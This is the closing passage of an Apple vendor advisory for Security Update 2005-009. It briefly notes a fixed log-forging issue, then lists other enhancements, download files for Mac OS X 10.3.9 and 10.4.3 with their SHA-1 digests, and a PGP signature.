a local attacker could forge entries with the intention to mislead the system administrator. This update addresses the issue by specially handling control characters and other non-printable characters. This issue does not affect systems prior to Mac OS X v10.4. Credit to HELIOS Software GmbH for reporting this issue. Additional Information Also included in this update are enhancements to Safari to improve handling of credit card security codes (Mac OS X v10.3.9 and Mac OS X v10.4.3), CoreTypes to improve handling of Terminal files (Mac OS X v10.4.3), QuickDraw Manager to improve rendering of PICT files (Mac OS X v10.3.9), documentation regarding OpenSSH and PAM (Mac OS X v10.4.3), and ServerMigration to remove unneeded privileges. Security Update 2005-009 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ For Mac OS X v10.4.3 The download file is named: "SecUpd2005-009Ti.dmg" Its SHA-1 digest is: 544f51a7bc73a57dbca95e05693904aadb2f94b1 For Mac OS X Server v10.4.3 The download file is named: "SecUpdSrvr2005-009Ti.dmg" Its SHA-1 digest is: b7620426151b8f1073c9ff73b2adf43b3086cc60 For Mac OS X v10.3.9 The download file is named: "SecUpd2005-009Pan.dmg" Its SHA-1 digest is: ea17ad7852b3e6277f53c2863e51695ac7018650 For Mac OS X Server v10.3.9 The download file is named: "SecUpdSrvr2005-009Pan.dmg" Its SHA-1 digest is: b03711729697ea8e6b683eb983343f2f3de3af13 Information will also be posted to the Apple Product Security web site: http://docs.info.apple.com/article.html?artnum=61798 This message is signed with Apple's Product Security PGP key, and details are available at: http://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.0.1 (Build 2185) iQEVAwUBQ4zotIHaV5ucd/HdAQJiPAf/S7bsLZk3R7I8FBidCKQ/bxSxjhTFx8sK vqsVFNDsXzv+tEa3IP58D8lI8lF94o+50p59qaPWxHzl4HxPVKlH4YCiBesYmVRp FcGo0qbzj5wJzdWADPV+I8O+/CR5k8J35PuKDIzPabnO67nxoXc/DF6go50e5Hr9 Yqs2477ufq0ANd8wG9dF5pfcYwD8KRLfOmfJ9ZVhbG8Up0uO4JH71cTQZIFcKkYf g6N9SCnqx5JqCwsRx85a8WuY1x97K3zqP53/bt4Wzi76VaaSaYj01nVywworTik4 YzOWOckJmWU9+66iby9mKY2mzz+u/vwtiMp577yT4y9FiSg6yp7mWQ== =jnz9 -----END PGP SIGNATURE-----